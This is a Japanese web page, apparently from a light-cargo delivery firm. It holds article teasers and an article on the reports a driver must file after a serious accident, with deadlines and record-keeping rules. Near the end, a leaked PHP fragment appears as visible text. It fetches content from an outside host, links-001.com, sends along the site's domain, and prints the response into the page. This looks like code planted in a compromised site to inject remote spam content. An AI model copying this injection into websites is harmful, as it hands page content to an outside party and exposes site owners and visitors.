前へ
次へ

軽貨物による運送を行った際の収入の相場

軽貨物の運送業者として働くと高収入を得られるといった話を聞く一方、稼ぐにはそれなりの苦労が必要といっ

more

軽貨物の運送にて収入を安定させる方法

軽貨物の運送の仕事は依頼の数に応じて収入が変化するため、安定した収入を得にくい仕事でもあります。もし

more

ネットスーパーの運送には軽貨物の運送が活用されています

企業間配送や宅配便など軽貨物の運送業者は近年様々な分野にて活用されています。その中の1つがネットスー

more

軽貨物の運送中の事故の報告は警察以外にも必要?

軽貨物の運送中の事故は警察や荷主様などにも報告が義務となっていますが、事故の状態や被害によってはさらに別の機関へと報告が必要となることがあります。もし軽貨物の運送中に重大事故を発生させた場合には必ず管轄する運輸局に対して事故の種類や原因・その他必要となる記載事項を記入した自動車事故報告書を作成し、30日以内に提出することが義務となってきます。いくつかの規定がありますが、重傷者や死亡者が発生した場合や10人以上の負傷者が発生した事故など法律により、規定が決まっています。そのため軽貨物の運送中に事故を起こした場合には必ず報告する義務のある基準となる事故ではないかを確認しておくようにしましょう。軽貨物の重大事故の際の提出が義務付けられている事故報告書ですが、提出をしてそれで終了ではありません。軽貨物の運送業者がこれらの事故を発生させた場合は法律の規定により、事故を起こした乗務員の氏名や事故の発生日時や場所などの必要事項を記録したうえで、3年間保存をする必要があります。記載すべき規定事項は運輸局などのホームページにも記載されているため事前に確認をしておくと便利です。また事故報告書の提出以外にも軽貨物の運送中に重大事故を起こした場合は事故速報を運輸局へと行う必要があります。ですから24時間以内に必ず運輸局へと事故速報をすることが大切です。もし判断がつかない場合は警察や所属する軽貨物の運送業者に相談をするようにしましょう。軽貨物を含むドライバーは業務上事故に遭遇をする可能性が高い職業です。そのため万が一軽貨物の運送中に事故に遭遇した場合どういった報告や手続きが必要であるかを一通り調べておきましょう。しかし、いざ事故に遭遇した際はパニックになってしまい、調べたことが出てこなくなる可能性もあります。そういった時のために事故の際のマニュアルを作成し、車の中に積んでおけば何かあった際も落ち着いて対処することができそうです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top